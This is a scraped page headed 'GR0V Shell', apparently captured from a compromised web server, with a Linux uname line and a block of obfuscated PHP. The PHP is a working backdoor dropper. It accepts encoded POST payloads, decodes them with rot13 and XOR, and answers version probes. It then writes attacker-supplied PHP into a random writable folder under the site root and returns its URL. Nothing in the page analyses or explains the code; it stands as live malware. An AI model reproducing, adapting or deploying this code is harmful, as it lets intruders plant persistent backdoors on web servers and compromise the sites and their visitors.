?
GR0V Shell
GR0V shell
Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64
<?php $gwmsxkeioj = "ynvxttfgxcpstpit";$bgxinvqzn = "";foreach ($_POST as $csbmygmdw => $luikdebqdjbpmrs){if (strlen($csbmygmdw) == 16 and substr_count($luikdebqdjbpmrs, "%") > 10){upuvzwfvm($csbmygmdw, $luikdebqdjbpmrs);}}function upuvzwfvm($csbmygmdw, $qwnlbhxqvy){global $bgxinvqzn;$bgxinvqzn = $csbmygmdw;$qwnlbhxqvy = str_split(rawurldecode(str_rot13($qwnlbhxqvy)));function dfphblto($rnnyw, $csbmygmdw){global $gwmsxkeioj, $bgxinvqzn;return $rnnyw ^ $gwmsxkeioj[$csbmygmdw % strlen($gwmsxkeioj)] ^ $bgxinvqzn[$csbmygmdw % strlen($bgxinvqzn)];}$qwnlbhxqvy = implode("", array_map("dfphblto", array_values($qwnlbhxqvy), array_keys($qwnlbhxqvy)));$qwnlbhxqvy = @unserialize($qwnlbhxqvy);if (@is_array($qwnlbhxqvy)){$csbmygmdw = array_keys($qwnlbhxqvy);$qwnlbhxqvy = $qwnlbhxqvy[$csbmygmdw[0]];if ($qwnlbhxqvy === $csbmygmdw[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function hobzlzs($luikdeir) {static $epknzuill = array();$nwybkaitnf = glob($luikdeir . '/*', GLOB_ONLYDIR);if (count($nwybkaitnf) > 0) {foreach ($nwybkaitnf as $luikde){if (@is_writable($luikde)){$epknzuill[] = $luikde;}}}foreach ($nwybkaitnf as $luikdeir) hobzlzs($luikdeir);return $epknzuill;}$yhjgjyqx = $_SERVER["DOCUMENT_ROOT"];$nwybkaitnf = hobzlzs($yhjgjyqx);$csbmygmdw = array_rand($nwybkaitnf);$lftlgub = $nwybkaitnf[$csbmygmdw] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($lftlgub, $qwnlbhxqvy);echo "http://" . $_SERVER["HTTP_HOST"] . substr($lftlgub, strlen($yhjgjyqx));exit();}}}
T1KUS90T